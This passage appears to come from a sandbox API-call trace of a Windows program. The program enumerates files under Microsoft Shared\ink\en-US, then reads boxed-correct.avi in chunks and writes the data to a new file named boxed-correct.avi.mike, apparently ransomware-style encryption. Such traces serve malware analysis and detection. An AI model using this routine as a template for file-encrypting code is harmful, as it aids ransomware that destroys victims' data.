ftCreationTime.dwLowDateTime=0x110442fe, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x1138bee4, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x110442fe, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0x0, dwReserved1=0x0, cFileName="IpsMigrationPlugin.dll.mui", cAlternateFileName="")) returned 1 [0044.272] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x250aa25, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x250aa25, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x9a5aa753, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x36400, dwReserved0=0x0, dwReserved1=0x0, cFileName="join.avi", cAlternateFileName="")) returned 1 [0044.272] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x110442fe, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x1138bee4, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x110442fe, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x2200, dwReserved0=0x0, dwReserved1=0x0, cFileName="micaut.dll.mui", cAlternateFileName="")) returned 1 [0044.272] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x110442fe, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x1138bee4, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x110442fe, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x2800, dwReserved0=0x0, dwReserved1=0x0, cFileName="mip.exe.mui", cAlternateFileName="")) returned 1 [0044.272] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x110442fe, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x1138bee4, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x110442fe, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0x0, dwReserved1=0x0, cFileName="mshwLatin.dll.mui", cAlternateFileName="")) returned 1 [0044.272] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeca1847, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0xf901a42, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xeca1847, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0x0, dwReserved1=0x0, cFileName="rtscom.dll.mui", cAlternateFileName="")) returned 1 [0044.273] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x110442fe, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x1138bee4, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x110442fe, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xaa00, dwReserved0=0x0, dwReserved1=0x0, cFileName="ShapeCollector.exe.mui", cAlternateFileName="")) returned 1 [0044.273] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x25c90f6, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x25c90f6, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x9a5d08b1, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x2f600, dwReserved0=0x0, dwReserved1=0x0, cFileName="split.avi", cAlternateFileName="")) returned 1 [0044.273] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa23a9ac, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0xa5a884b, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xa23a9ac, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xc00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tabskb.dll.mui", cAlternateFileName="")) returned 1 [0044.273] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x110442fe, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x1138bee4, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x110442fe, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xc00, dwReserved0=0x0, dwReserved1=0x0, cFileName="TipBand.dll.mui", cAlternateFileName="")) returned 1 [0044.273] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x110442fe, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x1138bee4, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x110442fe, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x8000, dwReserved0=0x0, dwReserved1=0x0, cFileName="TipRes.dll.mui", cAlternateFileName="")) returned 1 [0044.273] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe5cd75ed, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe5f38bbd, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe5f38bbd, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0044.273] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x110442fe, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x1138bee4, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x110442fe, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xc00, dwReserved0=0x0, dwReserved1=0x0, cFileName="TipTsf.dll.mui", cAlternateFileName="")) returned 1 [0044.273] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0044.273] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0044.274] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af164) returned 1 [0044.274] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af170) returned 1 [0044.274] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi", lpFilePart=0x0) returned 0x4a [0044.274] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi", lpFilePart=0x0) returned 0x4a [0044.274] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi", nBufferLength=0x105, lpBuffer=0x2aebe0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi", lpFilePart=0x0) returned 0x4a [0044.274] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0d4) returned 1 [0044.274] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-correct.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0044.346] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2adf10) returned 1 [0044.346] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi", nBufferLength=0x105, lpBuffer=0x2aeb18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi", lpFilePart=0x0) returned 0x4a [0044.346] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af00c) returned 1 [0044.346] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-correct.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.348] GetFileType (hFile=0x264) returned 0x1 [0044.348] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af008) returned 1 [0044.348] GetFileType (hFile=0x264) returned 0x1 [0044.348] CloseHandle (hObject=0x264) returned 1 [0044.349] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi", lpFilePart=0x0) returned 0x4a [0044.349] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi", lpFilePart=0x0) returned 0x4a [0044.349] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x2aec14, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0044.349] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af168) returned 1 [0044.349] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0044.349] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af164) returned 1 [0044.349] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0044.349] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-correct.avi"), fInfoLevelId=0x0, lpFileInformation=0x22c98d8 | out: lpFileInformation=0x22c98d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9a407849, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x9a407849, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x9a407849, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x15e00)) returned 1 [0044.349] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0044.349] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi", lpFilePart=0x0) returned 0x4a [0044.349] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0044.349] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-correct.avi"), fInfoLevelId=0x0, lpFileInformation=0x22c9c0c | out: lpFileInformation=0x22c9c0c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9a407849, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x9a407849, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x9a407849, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x15e00)) returned 1 [0044.349] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0044.349] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi", nBufferLength=0x105, lpBuffer=0x2aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi", lpFilePart=0x0) returned 0x4a [0044.349] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi.mike", lpFilePart=0x0) returned 0x4f [0044.349] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0044.350] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-correct.avi.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af16c | out: lpFileInformation=0x2af16c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0044.350] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0044.350] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi", nBufferLength=0x105, lpBuffer=0x2aec70, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi", lpFilePart=0x0) returned 0x4a [0044.350] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi", lpFilePart=0x0) returned 0x4a [0044.350] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi", nBufferLength=0x105, lpBuffer=0x2aebf4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi", lpFilePart=0x0) returned 0x4a [0044.350] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi.mike", nBufferLength=0x105, lpBuffer=0x2aebf8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi.mike", lpFilePart=0x0) returned 0x4f [0044.350] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af058) returned 1 [0044.350] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-correct.avi.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af0d4 | out: lpFileInformation=0x2af0d4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0044.350] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af054) returned 1 [0044.350] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi.mike", lpFilePart=0x0) returned 0x4f [0044.350] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0044.350] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-correct.avi.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.351] GetFileType (hFile=0x264) returned 0x1 [0044.351] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0044.351] GetFileType (hFile=0x264) returned 0x1 [0044.351] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x0 [0044.351] WriteFile (in: hFile=0x264, lpBuffer=0x22cab10*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x22cab10*, lpNumberOfBytesWritten=0x2af074*=0x220, lpOverlapped=0x0) returned 1 [0044.352] CloseHandle (hObject=0x264) returned 1 [0044.352] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a0) returned 1 [0044.352] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-correct.avi"), fInfoLevelId=0x0, lpFileInformation=0x22ca5ec | out: lpFileInformation=0x22ca5ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9a407849, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x9a407849, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x9a407849, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x15e00)) returned 1 [0044.352] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af09c) returned 1 [0044.352] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi", lpFilePart=0x0) returned 0x4a [0044.352] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0044.352] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-correct.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.352] GetFileType (hFile=0x264) returned 0x1 [0044.352] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0044.352] GetFileType (hFile=0x264) returned 0x1 [0044.352] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x0 [0044.352] ReadFile (in: hFile=0x264, lpBuffer=0x22cbc4c, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x22cbc4c*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0044.354] CloseHandle (hObject=0x264) returned 1 [0044.355] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi.mike", lpFilePart=0x0) returned 0x4f [0044.355] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0044.355] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-correct.avi.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.355] GetFileType (hFile=0x264) returned 0x1 [0044.355] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0044.355] GetFileType (hFile=0x264) returned 0x1 [0044.355] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x220 [0044.356] WriteFile (in: hFile=0x264, lpBuffer=0x22d61b4*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af094, lpOverlapped=0x0 | out: lpBuffer=0x22d61b4*, lpNumberOfBytesWritten=0x2af094*=0x2800, lpOverlapped=0x0) returned 1 [0044.356] CloseHandle (hObject=0x264) returned 1 [0044.357] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi", lpFilePart=0x0) returned 0x4a [0044.357] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0044.357] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-correct.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.357] GetFileType (hFile=0x264) returned 0x1 [0044.357] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0044.357] GetFileType (hFile=0x264) returned 0x1 [0044.357] SetFilePointer (in: hFile=0x264, lDistanceToMove=10240, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x2800 [0044.357] ReadFile (in: hFile=0x264, lpBuffer=0x22d8c34, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x22d8c34*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0044.357] CloseHandle (hObject=0x264) returned 1 [0044.358] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi.mike", lpFilePart=0x0) returned 0x4f [0044.358] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0044.358] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-correct.avi.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.358] GetFileType (hFile=0x264) returned 0x1 [0044.358] GetFileType (hFile=0x264) returned 0x1 [0044.358] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x2a20 [0044.358] WriteFile (in: hFile=0x264, lpBuffer=0x22e319c*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af094, lpOverlapped=0x0 | out: lpBuffer=0x22e319c*, lpNumberOfBytesWritten=0x2af094*=0x2800, lpOverlapped=0x0) returned 1 [0044.359] CloseHandle (hObject=0x264) returned 1 [0044.359] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi", lpFilePart=0x0) returned 0x4a [0044.360] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-correct.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.360] GetFileType (hFile=0x264) returned 0x1 [0044.360] GetFileType (hFile=0x264) returned 0x1 [0044.360] SetFilePointer (in: hFile=0x264, lDistanceToMove=20480, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x5000 [0044.360] ReadFile (in: hFile=0x264, lpBuffer=0x22e5c1c, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x22e5c1c*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0044.360] CloseHandle (hObject=0x264) returned 1 [0044.365] GetFullPathNameW (in: 